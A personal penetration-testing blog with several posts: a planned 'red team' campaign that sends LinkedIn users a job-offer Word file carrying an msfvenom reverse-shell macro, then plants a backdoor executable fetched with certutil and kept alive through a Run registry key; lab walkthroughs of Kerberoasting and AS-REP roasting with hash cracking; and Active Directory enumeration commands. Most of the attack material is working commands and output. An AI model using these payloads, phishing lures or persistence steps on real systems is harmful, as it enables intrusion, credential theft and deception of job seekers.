Total Pageviews

Thursday, September 30, 2021

RedTeam Challenge: Project S0c14l M3d1a series[II]

 Hi everyone,


In this step we are going to make a malicious office file that contains embedded malware using an easy techniques.

Attack context is a trojan file that execute a malware internally during a file visualization or edit by the target user.


GENEARTE MALICIOUS PAYLOAD:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=9999 -f vba > payload2.vba

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 324 bytes

Final size of vba file: 2626 bytes

The first step is create a malicious payload with msfvenom tool on the attacker machine the output format should be vba file.This type of extension file belong to Microsoft office macros scripting software on windows.


GENERATE DOCUMENT:

I use "Macro pack" tool for inject the previous malicious payload on the trojan document:


The document file looks like a normal Microsoft office word document:


EDIT AND SEND DOCUMENT:

This is the moment of edit the document with the information that you want, for example a job opportunity:



WAIT FOR RESPONSE:

And form the attacker side yoo only need wait for response on the chosen in the malicious payload and enjoy:


PERSISTENCE:


1. From the attacker machine obtain generate a new payload:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=6969 -f exe > backdoor.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 324 bytes

Final size of exe file: 73802 bytes

The previous command generate an executable windows file with name backdoor and extension ".exe"

2. From the attacker machine launch a http server with python3 for share the exe file with the target machine:

python3 -m http.server 8989

Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...

10.10.10.8 - - [30/Sep/2021 20:25:13] "GET /backdoor.exe HTTP/1.1" 200 -

10.10.10.8 - - [30/Sep/2021 20:25:13] "GET /backdoor.exe HTTP/1.1" 200 -

3. From the target machine, download the binary file with certutil:

certutil -f -urlcache "http://10.10.10.5:8989/backdoor.exe" %APPDATA%\backdoor.exe

certutil -f -urlcache "http://10.10.10.5:8989/backdoor.exe" %APPDATA%\backdoor.exe

****  En l�nea  ****

CertUtil: -URLCache comando completado correctamente.


4. Modify registry on the target machine for persistence operation:

reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v persistence2 /t REG_SZ 

/d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \"start-process  $env:APPDATA\backdor.exe\"


And this is all, for every reboot of the target machine and login by the powned user : 

The binary backdor.exe it's going to be execute byitself and this binary spawn cmd to the attacker machine.





And this is all for my first RedTeam challenge execution "step 2", I hope that you'll share with me this challenge on the next days and we keep in touch.

with best regards, f0ns1



at No comments:

Wednesday, September 29, 2021

RedTeam Challenge: Project S0c14l M3d1a series[I]

Hi everyone,

So  far so good, in this case i'm going to challenge myself with a new project that belong to a RedTeam. 

I want to advise everybady that this content don't directly belong to the OSCP certification, but it's allow me implements and assembly my hacking knowleges that i learned before in my academic and laboral life.

For me it's amazing!, because nobady explained to me how to do that project and could be very usefull and so visual example that how to a real attacker could access to your company network, get admin credentials and steal your data.


PROJECT STRUCTURE

Every Project should be start with a timing definition and structures:




ATTACK ARCHITECTURE

This is a high level attack architecture definition:

TARGETS DEFINITION:

    - Social Media: Linkedin

    - Company: CORPORATIVE.domain.local 



    - User: Member of company (I want a new Job)
    

   
    - Type of attack: contact with the target user with inmail private  message/ attach malicious file 

   

OBJETIVES OF REDTEAM CAMPAING:

There are a couple of ofjectives, external and internal:

    - The internal objetive is compromise the user and finally the company if it's possible.
    - The external objective is learn about cybersecurty, explain my knoledges and advise every people that usually use this kind of laboral social media.

And this is all for my first RedTeam challenge execution, I hope that you'll share with me this challenge on the next days and we keep in touch.

with best regards, f0ns1


at No comments:

Sunday, September 19, 2021

Active Directory CORPORATIVE.domain.local Series[VIII] : Kerberoasting && AS-REP-Roasting attacks

Hi everyone!,

So far so good, In this post, i'm going to introduce yourself an other couple of Active directory attacks famous . Kerberoasting and AS-REP-Roasting.

This kind of attacks, are performance directly from the attacker side (kali linux machine) to Domian Controller of CORPORATIVE.DOMAIN.local environment:


1. KERBEROASTING ATTACK


The kerberoasting attack is performed directly to an existing account of the target domain that has the SPN configured and enable.

For more information about SPN (Service Principal Name), you could read the following link:

 https://docs.microsoft.com/es-es/archive/blogs/autz_auth_stuff/what-is-a-spn-and-why-should-you-care


1.1 Kerberoasting detection:


Using the GetUserSPNs.py tool, from the attacker machine side with a domain user and calid credentials, we can obtain the vulnerable users to kerberoasting attack.




1.2 Prerequisite:

Configure a vulnerable user to kerberoasting attack from on your domain controller:

- Create new user for this kind of attack:



- Set SPN to the target user:


1.3 Kerberoasting exploitation:


- Using the previous Impacket script is possible detect the new user with Service Principal Name, that it's going to be the target domain user for the attack exploitation:

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py CORPORATIVE.DOMAIN.local/worker2:Passw0rd1
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName                                     Name         MemberOf                                                                                       PasswordLastSet             LastLogon  Delegation 
-------------------------------------------------------  -----------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  ----------
CORPORATIVE.DOMAIN.local/SVC_service.CORPORATIVE-DOMAIN  SVC_service  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 14:19:22.218200  <never>               

- TGS Hash request:


- Perform an offline dictionary attack:

 kali@kali:~$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt -format=KRB5TGS tgs_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

Passw0rd1        (?)
1g 0:00:20:47 DONE (2021-09-19 15:24) 0.000801g/s 2502Kp/s 2502Kc/s 2502KC/s Passw0r0831..Passw0rd12312
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And finally validate login for a new user:

kali@kali:~$ crackmapexec smb 10.0.2.1/24 -u"SVC_service" -p"Passw0rd1"
SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)
SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\SVC_service:Passw0rd1 (Pwn3d!)


2. AS-REP-ROASTING ATTACK

This attack is directly execute to Domain Controller too. In order to perform the attack, the attacker look for a users with not_pre authenticate property enabled for get a TGS kerberos Ticket.


2.1 AS-REP-Roasting detection:

The ASREPRoasting attack is performed directly to an existing account that is vulnerable to this kind of attacks, because it has enabled the NOT_PRE_AUTH attribute on domain account.


2.2 PREREQUISITE:

Configure a vulnerable user to ASREPRoasting attack from on your domain controller:

- Create new user for this kind of attack:


1.3 Kerberoasting exploitation:

- Looking for a vulnerable users: 

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py  CORPORATIVE.DOMAIN.local/worker2:Passw0rd1
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Name     MemberOf                                                                                       PasswordLastSet             LastLogon  UAC      
-------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  --------
NP_user  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 15:13:32.016064  <never>    0x410200 

- Obtaining a kerberos preauth TGS ticket:


$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6

- Performance an offline attack using hashcat :

sudo hashcat -m18200 '$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6' -a0 /usr/share/wordlists/rockyou.txt 

 The wordlist or mask that you are using is too small.

This means that hashcat cannot use the full parallel power of your device(s).

Unless you supply more work, your cracking speed will drop.

For tips on supplying more work, see: https://hashcat.net/faq/morework


Approaching final keyspace - workload adjusted.  


$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6:Passw0rd1

                                                 

Session..........: hashcat

Status...........: Cracked

Hash.Name........: Kerberos 5, etype 23, AS-REP

Hash.Target......: $krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9a...6caed6



-And finally validate login for a new user:

kali@kali:~$ crackmapexec smb 10.0.2.17 -u"NP_user" -p"Passw0rd1"

SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)

SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\NP_user:Passw0rd1 (Pwn3d!)



And this is all, for this couple Active directory attacks, I hope that you enjoy with my eigth windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

at No comments:

Saturday, September 18, 2021

Active Directory CORPORATIVE.domain.local Series[VII] : Active Directory Enumeration process

 Hi everyone!,

So far so good, right now in this post we are going to review enumeration over Domain Controller, from the attacker computer side and from the host client that belong to CORPORATIVE.DOMAIN.local environment:

1. OUTSIDE OF DOMAIN

From the attacker side using a valid user and credentials without admin rights, it's possible perform the followings enumerations:

1.1 RPCCLIENT:

rpcclient -U "worker2%Passw0rd1" 10.0.2.17

rpcclient $> enumdomusers

user:[Administrador] rid:[0x1f4]

user:[Invitado] rid:[0x1f5]

user:[krbtgt] rid:[0x1f6]

user:[DefaultAccount] rid:[0x1f7]

user:[worker1] rid:[0x452]

user:[worker2] rid:[0x453]

rpcclient $> enumdomgroups

group:[Enterprise Domain Controllers de sólo lectura] rid:[0x1f2]

group:[Admins. del dominio] rid:[0x200]

group:[Usuarios del dominio] rid:[0x201]

group:[Invitados del dominio] rid:[0x202]

group:[Equipos del dominio] rid:[0x203]

group:[Controladores de dominio] rid:[0x204]

group:[Administradores de esquema] rid:[0x206]

group:[Administradores de empresas] rid:[0x207]

group:[Propietarios del creador de directivas de grupo] rid:[0x208]

group:[Controladores de dominio de sólo lectura] rid:[0x209]

group:[Controladores de dominio clonables] rid:[0x20a]

group:[Protected Users] rid:[0x20d]

group:[Administradores clave] rid:[0x20e]

group:[Administradores clave de la organización] rid:[0x20f]

group:[DnsUpdateProxy] rid:[0x44e]

group:[RDP] rid:[0x454]

queryusers / querygroups / querygroupsmem:

Obtain the groups that an specific user belong:

rpcclient $> enumdomusers 
user:[Administrador] rid:[0x1f4]
user:[Invitado] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[worker1] rid:[0x452]
user:[worker2] rid:[0x453]
rpcclient $> queryusergroups 0x1f4
        group rid:[0x200] attr:[0x7]
        group rid:[0x201] attr:[0x7]
        group rid:[0x208] attr:[0x7]
        group rid:[0x206] attr:[0x7]
        group rid:[0x207] attr:[0x7]
rpcclient $> querygroup 0x200
        Group Name:     Admins. del dominio
        Description:    Administradores designados del dominio
        Group Attribute:7
        Num Members:1
rpcclient $> querygroup 0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
rpcclient $> querygroup 0x208
        Group Name:     Propietarios del creador de directivas de grupo
        Description:    Los miembros de este grupo pueden modificar la directiva de grupo del dominio
        Group Attribute:7
        Num Members:1
rpcclient $> querygroup 0x206
        Group Name:     Administradores de esquema
        Description:    Administradores designados del esquema
        Group Attribute:7
        Num Members:1
rpcclient $> querygroup 0x207
        Group Name:     Administradores de empresas
        Description:    Administradores designados de la empresa
        Group Attribute:7
        Num Members:1
rpcclient $> 


Full automation recon process: users-memberof-groups

for i in `rpcclient -U "worker2%Passw0rd1" 10.0.2.17 -c "enumdomusers" | awk -F "rid:" '{ print $2}' | tr -d "[]"`; do echo "User rid: $i";echo "User data : ";rpcclient -U "worker2%Passw0rd1" 10.0.2.17 -c "queryuser $i";echo " User groups: " ;rpcclient -U "worker2%Passw0rd1" 10.0.2.17 -c "queryusergroups $i"; for j in `rpcclient -U "worker2%Passw0rd1" 10.0.2.17 -c "queryusergroups $i" | awk '{print $2}' | awk -F ":" '{print $2}' |tr -d "[]"`; do echo $j; rpcclient -U "worker2%Passw0rd1" 10.0.2.17 -c "querygroup $j" ;done done
User rid: 0x1f4
User data : 
        User Name   :   Administrador
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Cuenta integrada para la administración del equipo o dominio
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      sáb, 18 sep 2021 19:44:09 CEST
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      sáb, 11 sep 2021 23:18:53 CEST
        Password can change Time :      dom, 12 sep 2021 23:18:53 CEST
        Password must change Time:      jue, 14 sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x1f4
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x0000001a
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x200] attr:[0x7]
        group rid:[0x201] attr:[0x7]
        group rid:[0x208] attr:[0x7]
        group rid:[0x206] attr:[0x7]
        group rid:[0x207] attr:[0x7]
0x200
        Group Name:     Admins. del dominio
        Description:    Administradores designados del dominio
        Group Attribute:7
        Num Members:1
0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
0x208
        Group Name:     Propietarios del creador de directivas de grupo
        Description:    Los miembros de este grupo pueden modificar la directiva de grupo del dominio
        Group Attribute:7
        Num Members:1
0x206
        Group Name:     Administradores de esquema
        Description:    Administradores designados del esquema
        Group Attribute:7
        Num Members:1
0x207
        Group Name:     Administradores de empresas
        Description:    Administradores designados de la empresa
        Group Attribute:7
        Num Members:1
User rid: 0x1f5
User data : 
        User Name   :   Invitado
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Cuenta integrada para el acceso como invitado al equipo o dominio
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      jue, 01 ene 1970 01:00:00 CET
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      jue, 01 ene 1970 01:00:00 CET
        Password can change Time :      jue, 01 ene 1970 01:00:00 CET
        Password must change Time:      jue, 14 sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x1f5
        group_rid:      0x202
        acb_info :      0x00000215
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x202] attr:[0x7]
0x202
        Group Name:     Invitados del dominio
        Description:    Todos los invitados del dominio
        Group Attribute:7
        Num Members:1
User rid: 0x1f6
User data : 
        User Name   :   krbtgt
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Cuenta de servicio de centro de distribución de claves
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      jue, 01 ene 1970 01:00:00 CET
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      dom, 12 sep 2021 00:29:47 CEST
        Password can change Time :      lun, 13 sep 2021 00:29:47 CEST
        Password must change Time:      dom, 24 oct 2021 00:29:47 CEST
        unknown_2[0..31]...
        user_rid :      0x1f6
        group_rid:      0x201
        acb_info :      0x00000011
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x201] attr:[0x7]
0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
User rid: 0x1f7
User data : 
        User Name   :   DefaultAccount
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Cuenta de usuario administrada por el sistema.
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      jue, 01 ene 1970 01:00:00 CET
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      jue, 01 ene 1970 01:00:00 CET
        Password can change Time :      jue, 01 ene 1970 01:00:00 CET
        Password must change Time:      jue, 14 sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x1f7
        group_rid:      0x201
        acb_info :      0x00000215
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x201] attr:[0x7]
0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
User rid: 0x452
User data : 
        User Name   :   worker1
        Full Name   :   trabajador1
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      dom, 12 sep 2021 19:57:13 CEST
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      dom, 12 sep 2021 13:14:04 CEST
        Password can change Time :      lun, 13 sep 2021 13:14:04 CEST
        Password must change Time:      jue, 14 sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x452
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000009
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x201] attr:[0x7]
0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
User rid: 0x453
User data : 
        User Name   :   worker2
        Full Name   :   trabajador2
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      sáb, 18 sep 2021 20:33:46 CEST
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      dom, 12 sep 2021 13:14:39 CEST
        Password can change Time :      lun, 13 sep 2021 13:14:39 CEST
        Password must change Time:      jue, 14 sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x453
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x0000004b
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x201] attr:[0x7]
0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5


1.2 ad-ldap-enum

You'll follow tool installation from github: https://github.com/CroweCybersecurity/ad-ldap-enum

Tool execution over domain:

kali@kali:/opt/ad-ldap-enum$ python ad-ldap-enum.py  -l 10.0.2.17 -d CORPORATIVE.DOMAIN.local -u worker2 -p Passw0rd1
2021-09-18 21:02:39 INFO     Querying users
2021-09-18 21:02:39 INFO     Querying groups
2021-09-18 21:02:39 INFO     Querying computers
2021-09-18 21:02:39 INFO     Building users dictionary
2021-09-18 21:02:39 INFO     Building groups dictionary
2021-09-18 21:02:39 INFO     Building computers dictionary
2021-09-18 21:02:39 INFO     Exploding large groups
2021-09-18 21:02:39 INFO     Building group membership
2021-09-18 21:02:39 INFO     There is a total of [50] groups
2021-09-18 21:02:39 INFO     Elapsed Time [0:00:00.028534]


1.3 ldapdomaindump

I include this tool because it permits one of the better recognition enumeration output that i've never seen:

Tool execution process:

ldapdomaindump -u "CORPORATIVE\worker2" -p Passw0rd1  10.0.2.17
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

Launching a local python3 http server:

kali@kali:/tmp$ python3 -m http.server 8989
Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...
127.0.0.1 - - [18/Sep/2021 21:11:50] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [18/Sep/2021 21:11:55] "GET /domain_computers.html HTTP/1.1" 200 -
127.0.0.1 - - [18/Sep/2021 21:11:58] "GET /domain_computers_by_os.html HTTP/1.1" 200 -
127.0.0.1 - - [18/Sep/2021 21:11:59] "GET /domain_groups.html HTTP/1.1" 200 -
127.0.0.1 - - [18/Sep/2021 21:12:01] "GET /domain_policy.html HTTP/1.1" 200 -
127.0.0.1 - - [18/Sep/2021 21:12:01] code 404, message File not found
127.0.0.1 - - [18/Sep/2021 21:12:01] "GET /favicon.ico HTTP/1.1" 404 -
----------------------------------------

Access to the html content from your browser:


Domain computers by operative system:

Doamain groups:



Domain policy:


Domain users:




Domain groups:




Domain computer accounts:

2. INSIDE OF DOMAIN

On that part of enumeration we perform the recognition of domain controller inside of corporate domain, using the tools from windows 10 computer client:

2.1 Windows CMD enumeration commands


Domain users:

 

C:\Users\worker2>net users /domain
Se procesará la solicitud en un controlador de dominio del dominio CORPORATIVE.DOMAIN.local.


Cuentas de usuario de \\CORPORATIVE-DOMAIN.CORPORATIVE.DOMAIN.local

-------------------------------------------------------------------------------
Administrador            DefaultAccount           Invitado
krbtgt                   worker1                  worker2
Se ha completado el comando correctamente.

Domain groups:

C:\Users\worker2>net groups /domain
Se procesará la solicitud en un controlador de dominio del dominio CORPORATIVE.DOMAIN.local.


Cuentas de grupo de \\CORPORATIVE-DOMAIN.CORPORATIVE.DOMAIN.local

-------------------------------------------------------------------------------
*Administradores clave
*Administradores clave de la organización
*Administradores de empresas
*Administradores de esquema
*Admins. del dominio
*Controladores de dominio
*Controladores de dominio clonables
*Controladores de dominio de sólo lectura
*DnsUpdateProxy
*Enterprise Domain Controllers de sólo lectura
*Equipos del dominio
*Invitados del dominio
*Propietarios del creador de directivas de grupo
*Protected Users
*RDP
*Usuarios del dominio
Se ha completado el comando correctamente.

Groups membership:

C:\Users\worker2>net group "Usuarios del dominio" /domain
Se procesará la solicitud en un controlador de dominio del dominio CORPORATIVE.DOMAIN.local.

Nombre de grupo     Usuarios del dominio
Comentario          Todos los usuarios del dominio

Miembros

-------------------------------------------------------------------------------
Administrador            DefaultAccount           krbtgt
worker1                  worker2
Se ha completado el comando correctamente.


Using wmic for domain enumeration:




Using wmic for domain groups enumeration:




2.2 Powershell: Active directory Module:


All suported functions:

PS C:\Users\worker2\Documents> Get-command -Module activedirectory

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Add-ADCentralAccessPolicyMember                    1.0.0.0    ActiveDirectory
Cmdlet          Add-ADComputerServiceAccount                       1.0.0.0    ActiveDirectory
Cmdlet          Add-ADDomainControllerPasswordReplicationPolicy    1.0.0.0    ActiveDirectory
Cmdlet          Add-ADFineGrainedPasswordPolicySubject             1.0.0.0    ActiveDirectory
Cmdlet          Add-ADGroupMember                                  1.0.0.0    ActiveDirectory
Cmdlet          Add-ADPrincipalGroupMembership                     1.0.0.0    ActiveDirectory
Cmdlet          Add-ADResourcePropertyListMember                   1.0.0.0    ActiveDirectory
Cmdlet          Clear-ADAccountExpiration                          1.0.0.0    ActiveDirectory
Cmdlet          Clear-ADClaimTransformLink                         1.0.0.0    ActiveDirectory
Cmdlet          Disable-ADAccount                                  1.0.0.0    ActiveDirectory
Cmdlet          Disable-ADOptionalFeature                          1.0.0.0    ActiveDirectory
Cmdlet          Enable-ADAccount                                   1.0.0.0    ActiveDirectory
Cmdlet          Enable-ADOptionalFeature                           1.0.0.0    ActiveDirectory
Cmdlet          Get-ADAccountAuthorizationGroup                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADAccountResultantPasswordReplicationPolicy    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADAuthenticationPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          Get-ADAuthenticationPolicySilo                     1.0.0.0    ActiveDirectory
Cmdlet          Get-ADCentralAccessPolicy                          1.0.0.0    ActiveDirectory
Cmdlet          Get-ADCentralAccessRule                            1.0.0.0    ActiveDirectory
Cmdlet          Get-ADClaimTransformPolicy                         1.0.0.0    ActiveDirectory
Cmdlet          Get-ADClaimType                                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADComputer                                     1.0.0.0    ActiveDirectory
Cmdlet          Get-ADComputerServiceAccount                       1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDCCloningExcludedApplicationList             1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDefaultDomainPasswordPolicy                  1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDomain                                       1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDomainController                             1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDomainControllerPasswordReplicationPolicy    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADDomainControllerPasswordReplicationPolicy... 1.0.0.0    ActiveDirectory
Cmdlet          Get-ADFineGrainedPasswordPolicy                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADFineGrainedPasswordPolicySubject             1.0.0.0    ActiveDirectory
Cmdlet          Get-ADForest                                       1.0.0.0    ActiveDirectory
Cmdlet          Get-ADGroup                                        1.0.0.0    ActiveDirectory
Cmdlet          Get-ADGroupMember                                  1.0.0.0    ActiveDirectory
Cmdlet          Get-ADObject                                       1.0.0.0    ActiveDirectory
Cmdlet          Get-ADOptionalFeature                              1.0.0.0    ActiveDirectory
Cmdlet          Get-ADOrganizationalUnit                           1.0.0.0    ActiveDirectory
Cmdlet          Get-ADPrincipalGroupMembership                     1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationAttributeMetadata                 1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationConnection                        1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationFailure                           1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationPartnerMetadata                   1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationQueueOperation                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationSite                              1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationSiteLink                          1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationSiteLinkBridge                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationSubnet                            1.0.0.0    ActiveDirectory
Cmdlet          Get-ADReplicationUpToDatenessVectorTable           1.0.0.0    ActiveDirectory
Cmdlet          Get-ADResourceProperty                             1.0.0.0    ActiveDirectory
Cmdlet          Get-ADResourcePropertyList                         1.0.0.0    ActiveDirectory
Cmdlet          Get-ADResourcePropertyValueType                    1.0.0.0    ActiveDirectory
Cmdlet          Get-ADRootDSE                                      1.0.0.0    ActiveDirectory
Cmdlet          Get-ADServiceAccount                               1.0.0.0    ActiveDirectory
Cmdlet          Get-ADTrust                                        1.0.0.0    ActiveDirectory
Cmdlet          Get-ADUser                                         1.0.0.0    ActiveDirectory
Cmdlet          Get-ADUserResultantPasswordPolicy                  1.0.0.0    ActiveDirectory
Cmdlet          Grant-ADAuthenticationPolicySiloAccess             1.0.0.0    ActiveDirectory
Cmdlet          Install-ADServiceAccount                           1.0.0.0    ActiveDirectory
Cmdlet          Move-ADDirectoryServer                             1.0.0.0    ActiveDirectory
Cmdlet          Move-ADDirectoryServerOperationMasterRole          1.0.0.0    ActiveDirectory
Cmdlet          Move-ADObject                                      1.0.0.0    ActiveDirectory
